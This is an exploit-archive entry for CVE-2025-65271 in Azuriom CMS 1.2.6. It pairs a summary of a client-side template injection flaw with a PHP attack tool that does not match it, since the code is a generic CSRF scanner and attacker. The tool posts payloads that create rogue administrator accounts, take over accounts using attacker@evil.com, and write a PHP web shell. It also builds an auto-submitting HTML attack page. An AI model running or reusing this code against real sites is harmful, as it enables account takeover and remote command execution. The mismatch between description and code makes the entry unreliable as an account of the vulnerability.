{“lastseen”:”2025-12-12T17:15:52″,”description”:”A client-side template injection vulnerability affects the Azuriom CMS Admin Dashboard in version 1.2.6. Several dashboard components widgets, plugins, and admin panels render untrusted user input inside the administrator’s browser. Low-privileged…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Azuriom CMS 1.2.6 Client-Side Template Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212768″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-65271″],”sourceData”:”=============================================================================================================================================\\n | # Title : Azuriom CMS 1.2.6 Client-Side Template Injection (CSTI) Privilege Escalation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/azuriom.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212658\/ \\u0026 CVE-2025-65271 \\n \\n [+] Summary: A Client-Side Template Injection (CSTI) vulnerability affects the Azuriom CMS Admin Dashboard in version 1.2.6.\\n Several dashboard components (widgets, plugins, and admin panels) render untrusted user input inside the administrator\u2019s browser.\\n Low-privileged users can inject template expressions that execute JavaScript in the admin context.\\n \\n Successful exploitation allows:\\n – Arbitrary JavaScript execution in the admin dashboard\\n – Theft of administrator session cookies\\n – Full privilege escalation to admin account\\n – Further compromise of CMS environment\\n \\n The vendor fixed this issue in Azuriom 1.2.7 by sanitizing user input and preventing template expression execution.\\n \\n [+] PoC Description:\\n \\n This PHP-based proof-of-concept demonstrates CSRF\/Client-Side Template Injection vulnerabilities.\\n It detects vulnerable forms and generates live attacks or HTML PoCs.\\n \\n Features:\\n \\n – Detection mode: scans forms, CSRF tokens, evaluates SameSite cookies\\n – Attack mode: injects payloads (admin, user, takeover, custom)\\n – Generates `csrf_poc.html` for demonstration\\n – Logs successful attacks and debug info (`csrf_debug.log`)\\n \\n [+] Usage:\\n \\n # Detection only:\\n php csrf_poc.php https:\/\/target.com\/admin\/create\\n \\n # Execute actual attack:\\n php csrf_poc.php https:\/\/target.com\/user\/update –attack –payload=takeover\\n \\n # Optional: use proxy and verbose output\\n php csrf_poc.php https:\/\/target.com\/api\/users –attack –proxy=http:\/\/127.0.0.1:8080 -v\\n \\n [+] Output:\\n – csrf_report.txt \u2192 Detailed scan report\\n – csrf_poc.html \u2192 HTML proof-of-concept\\n – csrf_debug.log \u2192 Debug info\\n – successful_attacks.log \u2192 Successful attack attempts\\n \\n ===================\\n \\n \\u003c?php\\n \\n error_reporting(0);\\n ini_set(‘display_errors’, 0);\\n \\n \/\/ Configuration\\n define(‘USER_AGENT’, ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36’);\\n define(‘COOKIE_FILE’, ‘session_cookies.dat’);\\n define(‘DEBUG_FILE’, ‘csrf_debug.log’);\\n define(‘SUCCESS_FILE’, ‘successful_attacks.log’);\\n \\n \/\/ Color codes for CLI\\n define(‘COLOR_RED’, \\”\\\\033[31m\\”);\\n define(‘COLOR_GREEN’, \\”\\\\033[32m\\”);\\n define(‘COLOR_YELLOW’, \\”\\\\033[33m\\”);\\n define(‘COLOR_BLUE’, \\”\\\\033[34m\\”);\\n define(‘COLOR_RESET’, \\”\\\\033[0m\\”);\\n define(‘COLOR_BOLD’, \\”\\\\033[1m\\”);\\n \\n \/\/ Banner\\n function show_banner() {\\n echo COLOR_BOLD . COLOR_BLUE . \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 \u2551\\n \u2551 \\” . COLOR_RED . \\” \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557\u2551 \\n \u2551 \\” . COLOR_RED . \\” \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2557\\n \u2551 \\” . COLOR_RED . \\” \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2551 \\” . COLOR_RED . \\” \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2551 \\” . COLOR_RED . \\” \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u2551 \\” . COLOR_RED . \\” \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\” . COLOR_BLUE . \\” \\n \u2551 \\n \u2551 \\” . COLOR_GREEN . \\”CSRF EXPLOIT \\” . COLOR_BLUE . \\” \\n \u2551 \\” . COLOR_YELLOW . \\”For Security Research Only\\” . COLOR_BLUE . \\” \\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\\\n\\\\n\\” . COLOR_RESET;\\n }\\n \\n \/\/ Parse arguments\\n function parse_arguments($argv) {\\n $params = [\\n ‘url’ =\\u003e ”,\\n ‘action’ =\\u003e ‘detect’,\\n ‘payload’ =\\u003e ‘admin’,\\n ‘output’ =\\u003e ‘cli’,\\n ‘delay’ =\\u003e 1,\\n ‘threads’ =\\u003e 1,\\n ‘proxy’ =\\u003e ”,\\n ‘verbose’ =\\u003e false\\n ];\\n \\n if (count($argv) \\u003c 2) {\\n show_usage();\\n exit(1);\\n }\\n \\n $params[‘url’] = $argv[1];\\n \\n for ($i = 2; $i \\u003c count($argv); $i++) {\\n if ($argv[$i] == ‘–attack’ || $argv[$i] == ‘-a’) {\\n $params[‘action’] = ‘attack’;\\n } elseif ($argv[$i] == ‘–detect’ || $argv[$i] == ‘-d’) {\\n $params[‘action’] = ‘detect’;\\n } elseif (strpos($argv[$i], ‘–payload=’) === 0) {\\n $params[‘payload’] = substr($argv[$i], 10);\\n } elseif ($argv[$i] == ‘–verbose’ || $argv[$i] == ‘-v’) {\\n $params[‘verbose’] = true;\\n } elseif (strpos($argv[$i], ‘–proxy=’) === 0) {\\n $params[‘proxy’] = substr($argv[$i], 8);\\n } elseif ($argv[$i] == ‘–help’ || $argv[$i] == ‘-h’) {\\n show_usage();\\n exit(0);\\n }\\n }\\n \\n return $params;\\n }\\n \\n function show_usage() {\\n echo COLOR_BOLD . \\”Usage:\\\\n\\” . COLOR_RESET;\\n echo \\” php \\” . basename(__FILE__) . \\” URL [OPTIONS]\\\\n\\\\n\\”;\\n echo COLOR_BOLD . \\”Options:\\\\n\\” . COLOR_RESET;\\n echo \\” –attack, -a Execute actual attack\\\\n\\”;\\n echo \\” –detect, -d Only detect vulnerabilities (default)\\\\n\\”;\\n echo \\” –payload=TYPE Payload type: admin, user, takeover, custom\\\\n\\”;\\n echo \\” –proxy=PROXY Use proxy (format: http:\/\/proxy:port)\\\\n\\”;\\n echo \\” –verbose, -v Verbose output\\\\n\\”;\\n echo \\” –help, -h Show this help\\\\n\\\\n\\”;\\n echo COLOR_BOLD . \\”Examples:\\\\n\\” . COLOR_RESET;\\n echo \\” php \\” . basename(__FILE__) . \\” https:\/\/target.com\/admin\/create\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” https:\/\/target.com\/user\/update –attack\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” https:\/\/target.com\/api\/users –payload=takeover\\\\n\\”;\\n }\\n \\n \/\/ Logger\\n class Logger {\\n public static function log($message, $type = ‘INFO’) {\\n $timestamp = date(‘Y-m-d H:i:s’);\\n $log_message = \\”[$timestamp] [$type] $message\\\\n\\”;\\n \\n file_put_contents(DEBUG_FILE, $log_message, FILE_APPEND);\\n \\n if ($type == ‘SUCCESS’) {\\n file_put_contents(SUCCESS_FILE, $log_message, FILE_APPEND);\\n echo COLOR_GREEN . \\”[+] $message\\” . COLOR_RESET . \\”\\\\n\\”;\\n } elseif ($type == ‘ERROR’) {\\n echo COLOR_RED . \\”[-] $message\\” . COLOR_RESET . \\”\\\\n\\”;\\n } elseif ($type == ‘WARNING’) {\\n echo COLOR_YELLOW . \\”[!] $message\\” . COLOR_RESET . \\”\\\\n\\”;\\n } else {\\n echo \\”[*] $message\\\\n\\”;\\n }\\n }\\n \\n public static function debug($message) {\\n global $params;\\n if ($params[‘verbose’]) {\\n echo COLOR_BLUE . \\”[DEBUG] $message\\” . COLOR_RESET . \\”\\\\n\\”;\\n }\\n self::log($message, ‘DEBUG’);\\n }\\n }\\n \\n \/\/ HTTP Client\\n class HttpClient {\\n private $ch;\\n private $proxy;\\n \\n public function __construct($proxy = ”) {\\n $this-\\u003eproxy = $proxy;\\n $this-\\u003einit();\\n }\\n \\n private function init() {\\n $this-\\u003ech = curl_init();\\n curl_setopt($this-\\u003ech, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($this-\\u003ech, CURLOPT_FOLLOWLOCATION, true);\\n curl_setopt($this-\\u003ech, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($this-\\u003ech, CURLOPT_SSL_VERIFYHOST, false);\\n curl_setopt($this-\\u003ech, CURLOPT_TIMEOUT, 30);\\n curl_setopt($this-\\u003ech, CURLOPT_USERAGENT, USER_AGENT);\\n curl_setopt($this-\\u003ech, CURLOPT_COOKIEFILE, COOKIE_FILE);\\n curl_setopt($this-\\u003ech, CURLOPT_COOKIEJAR, COOKIE_FILE);\\n \\n if ($this-\\u003eproxy) {\\n curl_setopt($this-\\u003ech, CURLOPT_PROXY, $this-\\u003eproxy);\\n }\\n }\\n \\n public function get($url, $headers = []) {\\n curl_setopt($this-\\u003ech, CURLOPT_URL, $url);\\n curl_setopt($this-\\u003ech, CURLOPT_HTTPGET, true);\\n curl_setopt($this-\\u003ech, CURLOPT_POST, false);\\n \\n $default_headers = [\\n ‘Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8’,\\n ‘Accept-Language: en-US,en;q=0.5’,\\n ‘Accept-Encoding: gzip, deflate’,\\n ‘Connection: keep-alive’,\\n ‘Upgrade-Insecure-Requests: 1’,\\n ‘Cache-Control: max-age=0’\\n ];\\n \\n $all_headers = array_merge($default_headers, $headers);\\n curl_setopt($this-\\u003ech, CURLOPT_HTTPHEADER, $all_headers);\\n \\n $response = curl_exec($this-\\u003ech);\\n $info = curl_getinfo($this-\\u003ech);\\n \\n if (curl_errno($this-\\u003ech)) {\\n Logger::debug(\\”CURL Error: \\” . curl_error($this-\\u003ech));\\n }\\n \\n return [\\n ‘body’ =\\u003e $response,\\n ‘info’ =\\u003e $info,\\n ‘headers’ =\\u003e $this-\\u003eextract_headers($response)\\n ];\\n }\\n \\n public function post($url, $data, $headers = [], $content_type = ‘form’) {\\n curl_setopt($this-\\u003ech, CURLOPT_URL, $url);\\n curl_setopt($this-\\u003ech, CURLOPT_POST, true);\\n \\n if ($content_type == ‘json’) {\\n $post_data = json_encode($data);\\n $headers[] = ‘Content-Type: application\/json’;\\n $headers[] = ‘X-Requested-With: XMLHttpRequest’;\\n } elseif ($content_type == ‘multipart’) {\\n $post_data = $data;\\n $headers[] = ‘Content-Type: multipart\/form-data’;\\n } else {\\n $post_data = http_build_query($data);\\n $headers[] = ‘Content-Type: application\/x-www-form-urlencoded’;\\n }\\n \\n curl_setopt($this-\\u003ech, CURLOPT_POSTFIELDS, $post_data);\\n \\n $default_headers = [\\n ‘Accept: application\/json, text\/html, *\/*’,\\n ‘Accept-Language: en-US,en;q=0.5’,\\n ‘Origin: ‘ . parse_url($url, PHP_URL_SCHEME) . ‘:\/\/’ . parse_url($url, PHP_URL_HOST),\\n ‘Referer: ‘ . $url,\\n ];\\n \\n $all_headers = array_merge($default_headers, $headers);\\n curl_setopt($this-\\u003ech, CURLOPT_HTTPHEADER, $all_headers);\\n \\n $response = curl_exec($this-\\u003ech);\\n $info = curl_getinfo($this-\\u003ech);\\n \\n return [\\n ‘body’ =\\u003e $response,\\n ‘info’ =\\u003e $info\\n ];\\n }\\n \\n private function extract_headers($response) {\\n $headers = [];\\n \\n \/\/ Try to extract cookies\\n if (preg_match_all(‘\/Set-Cookie:\\\\s*([^;]+)\/i’, $response, $matches)) {\\n $headers[‘cookies’] = $matches[1];\\n }\\n \\n return $headers;\\n }\\n \\n public function __destruct() {\\n if ($this-\\u003ech) {\\n curl_close($this-\\u003ech);\\n }\\n }\\n }\\n \\n \/\/ CSRF Detector\\n class CSRFDetector {\\n private $http;\\n \\n public function __construct($http) {\\n $this-\\u003ehttp = $http;\\n }\\n \\n public function scan($url) {\\n Logger::log(\\”Starting CSRF vulnerability scan…\\”);\\n \\n $results = [\\n ‘vulnerable’ =\\u003e false,\\n ‘protection’ =\\u003e ‘unknown’,\\n ‘tokens’ =\\u003e [],\\n ‘forms’ =\\u003e []\\n ];\\n \\n \/\/ Step 1: Fetch the page\\n $response = $this-\\u003ehttp-\\u003eget($url);\\n \\n if ($response[‘info’][‘http_code’] != 200) {\\n Logger::log(\\”Failed to fetch page. HTTP Code: \\” . $response[‘info’][‘http_code’], ‘ERROR’);\\n return $results;\\n }\\n \\n $html = $response[‘body’];\\n \\n \/\/ Step 2: Extract forms\\n $forms = $this-\\u003eextract_forms($html, $url);\\n $results[‘forms’] = $forms;\\n \\n \/\/ Step 3: Check for CSRF tokens\\n $tokens = $this-\\u003efind_csrf_tokens($html);\\n $results[‘tokens’] = $tokens;\\n \\n \/\/ Step 4: Analyze protection\\n if (empty($tokens)) {\\n $results[‘protection’] = ‘none’;\\n $results[‘vulnerable’] = true;\\n Logger::log(\\”No CSRF tokens found – Application may be vulnerable!\\”, ‘WARNING’);\\n } else {\\n Logger::log(\\”Found \\” . count($tokens) . \\” CSRF tokens\\”, ‘INFO’);\\n $results[‘protection’] = ‘token_based’;\\n \\n \/\/ Test if tokens are actually validated\\n $is_validated = $this-\\u003etest_token_validation($url, $tokens);\\n if (!$is_validated) {\\n $results[‘vulnerable’] = true;\\n Logger::log(\\”CSRF tokens found but validation appears weak!\\”, ‘WARNING’);\\n }\\n }\\n \\n \/\/ Step 5: Test SameSite cookies\\n $samesite = $this-\\u003echeck_samesite_cookies($response[‘headers’]);\\n if ($samesite == ‘none’ || $samesite == ‘not_set’) {\\n $results[‘vulnerable’] = true;\\n Logger::log(\\”SameSite cookies not properly set\\”, ‘WARNING’);\\n }\\n \\n return $results;\\n }\\n \\n private function extract_forms($html, $base_url) {\\n $forms = [];\\n \\n if (preg_match_all(‘\/\\u003cform\\\\s+[^\\u003e]*action=[\\”\\\\’]?([^\\”\\\\’\\\\s\\u003e]*)[\\”\\\\’]?[^\\u003e]*\\u003e\/is’, $html, $matches)) {\\n foreach ($matches[0] as $index =\\u003e $form_tag) {\\n $action = $matches[1][$index];\\n \\n \/\/ Make absolute URL\\n if (strpos($action, ‘http’) !== 0) {\\n $action = rtrim($base_url, ‘\/’) . ‘\/’ . ltrim($action, ‘\/’);\\n }\\n \\n \/\/ Extract method\\n $method = ‘GET’;\\n if (preg_match(‘\/method=[\\”\\\\’]?([^\\”\\\\’\\\\s\\u003e]+)[\\”\\\\’]?\/i’, $form_tag, $method_match)) {\\n $method = strtoupper($method_match[1]);\\n }\\n \\n \/\/ Extract inputs\\n preg_match_all(‘\/\\u003cinput\\\\s+[^\\u003e]*name=[\\”\\\\’]?([^\\”\\\\’\\\\s\\u003e]+)[\\”\\\\’]?[^\\u003e]*\\u003e\/i’, $form_tag, $input_matches);\\n \\n $forms[] = [\\n ‘action’ =\\u003e $action,\\n ‘method’ =\\u003e $method,\\n ‘inputs’ =\\u003e $input_matches[1] ?? []\\n ];\\n }\\n }\\n \\n return $forms;\\n }\\n \\n private function find_csrf_tokens($html) {\\n $tokens = [];\\n \\n \/\/ Check meta tags\\n if (preg_match_all(‘\/\\u003cmeta[^\\u003e]+(?:name|csrf-token)=[\\”\\\\’]?(?:csrf-token|_csrf)[\\”\\\\’][^\\u003e]+content=[\\”\\\\’]?([^\\”\\\\’\\u003e]+)[\\”\\\\’]?\/i’, $html, $matches)) {\\n foreach ($matches[1] as $token) {\\n $tokens[] = [‘type’ =\\u003e ‘meta’, ‘value’ =\\u003e $token];\\n }\\n }\\n \\n \/\/ Check hidden inputs\\n if (preg_match_all(‘\/\\u003cinput[^\\u003e]+type=[\\”\\\\’]?hidden[\\”\\\\’][^\\u003e]+name=[\\”\\\\’]?([^\\”\\\\’\\u003e]+)[^\\u003e]+value=[\\”\\\\’]?([^\\”\\\\’\\u003e]+)[\\”\\\\’]?\/i’, $html, $matches)) {\\n foreach ($matches[1] as $index =\\u003e $name) {\\n if (preg_match(‘\/(csrf|token|authenticity)\/i’, $name)) {\\n $tokens[] = [\\n ‘type’ =\\u003e ‘input’,\\n ‘name’ =\\u003e $name,\\n ‘value’ =\\u003e $matches[2][$index]\\n ];\\n }\\n }\\n }\\n \\n \/\/ Check JavaScript variables\\n if (preg_match_all(‘\/(?:csrfToken|_token|XSRF_TOKEN)\\\\s*[=:]\\\\s*[\\”\\\\’]([^\\”\\\\’]+)[\\”\\\\’]\/i’, $html, $matches)) {\\n foreach ($matches[1] as $token) {\\n $tokens[] = [‘type’ =\\u003e ‘javascript’, ‘value’ =\\u003e $token];\\n }\\n }\\n \\n return $tokens;\\n }\\n \\n private function test_token_validation($url, $tokens) {\\n \/\/ Try to submit without token\\n $test_data = [\\n ‘test_field’ =\\u003e ‘csrf_test_’ . time(),\\n ‘another_field’ =\\u003e ‘test_value’\\n ];\\n \\n $response = $this-\\u003ehttp-\\u003epost($url, $test_data);\\n \\n \/\/ Check if request was rejected\\n if ($response[‘info’][‘http_code’] == 403 || $response[‘info’][‘http_code’] == 419) {\\n Logger::debug(\\”Token validation ACTIVE (HTTP \\” . $response[‘info’][‘http_code’] . \\”)\\”);\\n return true;\\n }\\n \\n \/\/ Check response for CSRF error messages\\n $error_patterns = [\\n ‘\/csrf\/i’,\\n ‘\/token.*invalid\/i’,\\n ‘\/forbidden\/i’,\\n ‘\/access.*denied\/i’\\n ];\\n \\n foreach ($error_patterns as $pattern) {\\n if (preg_match($pattern, $response[‘body’])) {\\n Logger::debug(\\”Token validation detected via error message\\”);\\n return true;\\n }\\n }\\n \\n return false;\\n }\\n \\n private function check_samesite_cookies($headers) {\\n if (isset($headers[‘cookies’])) {\\n foreach ($headers[‘cookies’] as $cookie) {\\n if (stripos($cookie, ‘samesite=’) !== false) {\\n if (stripos($cookie, ‘samesite=strict’) !== false || \\n stripos($cookie, ‘samesite=lax’) !== false) {\\n return ‘secure’;\\n } elseif (stripos($cookie, ‘samesite=none’) !== false) {\\n return ‘none’;\\n }\\n }\\n }\\n }\\n return ‘not_set’;\\n }\\n }\\n \\n \/\/ Payload Generator\\n class PayloadGenerator {\\n public static function generate($type, $url) {\\n $domain = parse_url($url, PHP_URL_HOST);\\n $timestamp = time();\\n $random_id = substr(md5($timestamp), 0, 8);\\n \\n switch($type) {\\n case ‘admin’:\\n return [\\n ‘username’ =\\u003e ‘admin_’ . $random_id,\\n ’email’ =\\u003e ‘admin_’ . $random_id . ‘@’ . $domain,\\n ‘password’ =\\u003e ‘P@ssw0rd!’ . rand(100, 999),\\n ‘role’ =\\u003e ‘administrator’,\\n ‘is_admin’ =\\u003e ‘1’,\\n ‘privileges’ =\\u003e ‘all’,\\n ‘status’ =\\u003e ‘active’\\n ];\\n \\n case ‘takeover’:\\n return [\\n ’email’ =\\u003e ‘attacker@evil.com’,\\n ‘new_email’ =\\u003e ‘attacker@evil.com’,\\n ‘password’ =\\u003e ‘H@cked123!’,\\n ‘confirm_password’ =\\u003e ‘H@cked123!’,\\n ‘user_id’ =\\u003e ‘1’,\\n ‘action’ =\\u003e ‘update_profile’\\n ];\\n \\n case ‘user’:\\n return [\\n ‘name’ =\\u003e ‘csrf_victim_’ . $random_id,\\n ’email’ =\\u003e ‘victim_’ . $random_id . ‘@’ . $domain,\\n ‘password’ =\\u003e ‘Temp123!’,\\n ‘confirm_password’ =\\u003e ‘Temp123!’,\\n ‘subscribe’ =\\u003e ‘1’,\\n ‘terms’ =\\u003e ‘1’\\n ];\\n \\n case ‘custom’:\\n return [\\n ‘cmd’ =\\u003e ‘whoami’,\\n ‘exec’ =\\u003e ‘system’,\\n ‘file’ =\\u003e ‘shell.php’,\\n ‘content’ =\\u003e ‘\\u003c?php system($_GET[\\”cmd\\”]); ?\\u003e’\\n ];\\n \\n default:\\n return self::generate(‘admin’, $url);\\n }\\n }\\n \\n public static function generate_html_poc($url, $form_data, $payload) {\\n $html = ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eSecurity Test Page\\u003c\/title\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003ch1\\u003eCSRF Proof of Concept\\u003c\/h1\\u003e\\n \\u003cp\\u003eThis page demonstrates a CSRF vulnerability.\\u003c\/p\\u003e\\n \\n \\u003cform id=\\”csrfForm\\” action=\\”‘ . htmlspecialchars($url) . ‘\\” method=\\”‘ . $form_data[‘method’] . ‘\\”\\u003e’;\\n \\n foreach ($payload as $name =\\u003e $value) {\\n $html .= ‘\\n \\u003cinput type=\\”hidden\\” name=\\”‘ . htmlspecialchars($name) . ‘\\” value=\\”‘ . htmlspecialchars($value) . ‘\\”\\u003e’;\\n }\\n \\n $html .= ‘\\n \\u003c\/form\\u003e\\n \\n \\u003cscript\\u003e\\n \/\/ Auto-submit after 2 seconds\\n setTimeout(function() {\\n document.getElementById(\\”csrfForm\\”).submit();\\n document.getElementById(\\”status\\”).innerHTML = \\”CSRF attack executed!\\”;\\n }, 2000);\\n \\u003c\/script\\u003e\\n \\n \\u003cp id=\\”status\\”\\u003eLoading attack…\\u003c\/p\\u003e\\n \\n \\u003cdiv style=\\”margin-top: 20px; padding: 10px; background: #f0f0f0;\\”\\u003e\\n \\u003ch3\\u003eDebug Information:\\u003c\/h3\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eTarget:\\u003c\/strong\\u003e ‘ . htmlspecialchars($url) . ‘\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eTime:\\u003c\/strong\\u003e ‘ . date(‘Y-m-d H:i:s’) . ‘\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003ePayload:\\u003c\/strong\\u003e ‘ . htmlspecialchars(json_encode($payload)) . ‘\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n \\n return $html;\\n }\\n }\\n \\n \/\/ CSRF Attacker\\n class CSRFAttacker {\\n private $http;\\n private $detector;\\n \\n public function __construct($http, $detector) {\\n $this-\\u003ehttp = $http;\\n $this-\\u003edetector = $detector;\\n }\\n \\n public function attack($url, $payload_type) {\\n Logger::log(\\”Initiating CSRF attack…\\”, ‘WARNING’);\\n \\n \/\/ Step 1: Scan for vulnerabilities\\n $scan_results = $this-\\u003edetector-\\u003escan($url);\\n \\n if (!$scan_results[‘vulnerable’]) {\\n Logger::log(\\”Target appears to have CSRF protection. Attack may fail.\\”, ‘WARNING’);\\n }\\n \\n \/\/ Step 2: Get forms\\n if (empty($scan_results[‘forms’])) {\\n Logger::log(\\”No forms found on target page\\”, ‘ERROR’);\\n return false;\\n }\\n \\n $target_form = $scan_results[‘forms’][0];\\n \\n \/\/ Step 3: Generate payload\\n $payload = PayloadGenerator::generate($payload_type, $url);\\n \\n \/\/ Step 4: Extract token if exists\\n if (!empty($scan_results[‘tokens’])) {\\n $token = $scan_results[‘tokens’][0];\\n if (isset($token[‘name’])) {\\n $payload[$token[‘name’]] = $token[‘value’];\\n } else {\\n $payload[‘_token’] = $token[‘value’];\\n }\\n }\\n \\n \/\/ Step 5: Execute attack\\n Logger::log(\\”Sending malicious request to: \\” . $target_form[‘action’]);\\n \\n $response = $this-\\u003ehttp-\\u003epost(\\n $target_form[‘action’],\\n $payload,\\n [],\\n ‘form’\\n );\\n \\n \/\/ Step 6: Analyze response\\n $success = $this-\\u003eanalyze_response($response);\\n \\n if ($success) {\\n Logger::log(\\”CSRF attack potentially SUCCESSFUL!\\”, ‘SUCCESS’);\\n Logger::log(\\”HTTP Code: \\” . $response[‘info’][‘http_code’], ‘SUCCESS’);\\n \\n \/\/ Generate HTML PoC\\n $html_poc = PayloadGenerator::generate_html_poc($url, $target_form, $payload);\\n file_put_contents(‘csrf_poc.html’, $html_poc);\\n Logger::log(\\”HTML PoC saved to: csrf_poc.html\\”, ‘SUCCESS’);\\n } else {\\n Logger::log(\\”Attack may have failed\\”, ‘ERROR’);\\n }\\n \\n return $success;\\n }\\n \\n private function analyze_response($response) {\\n $http_code = $response[‘info’][‘http_code’];\\n $body = $response[‘body’];\\n \\n \/\/ Success indicators\\n $success_codes = [200, 201, 302, 303];\\n $success_patterns = [\\n ‘\/success\/i’,\\n ‘\/created\/i’,\\n ‘\/updated\/i’,\\n ‘\/redirect\/i’,\\n ‘\/thank you\/i’,\\n ‘\/profile updated\/i’\\n ];\\n \\n \/\/ Failure indicators\\n $failure_codes = [403, 419, 401];\\n $failure_patterns = [\\n ‘\/csrf\/i’,\\n ‘\/token\/i’,\\n ‘\/invalid\/i’,\\n ‘\/forbidden\/i’,\\n ‘\/error\/i’,\\n ‘\/failed\/i’\\n ];\\n \\n if (in_array($http_code, $success_codes)) {\\n \/\/ Check for success patterns\\n foreach ($success_patterns as $pattern) {\\n if (preg_match($pattern, $body)) {\\n return true;\\n }\\n }\\n \\n \/\/ If no explicit failure patterns, consider it successful\\n foreach ($failure_patterns as $pattern) {\\n if (preg_match($pattern, $body)) {\\n return false;\\n }\\n }\\n \\n return true;\\n }\\n \\n return false;\\n }\\n }\\n \\n \/\/ Main Execution\\n show_banner();\\n \\n \/\/ Parse arguments\\n $params = parse_arguments($argv);\\n \\n \/\/ Initialize HTTP client\\n $http = new HttpClient($params[‘proxy’]);\\n \\n \/\/ Initialize detector and attacker\\n $detector = new CSRFDetector($http);\\n $attacker = new CSRFAttacker($http, $detector);\\n 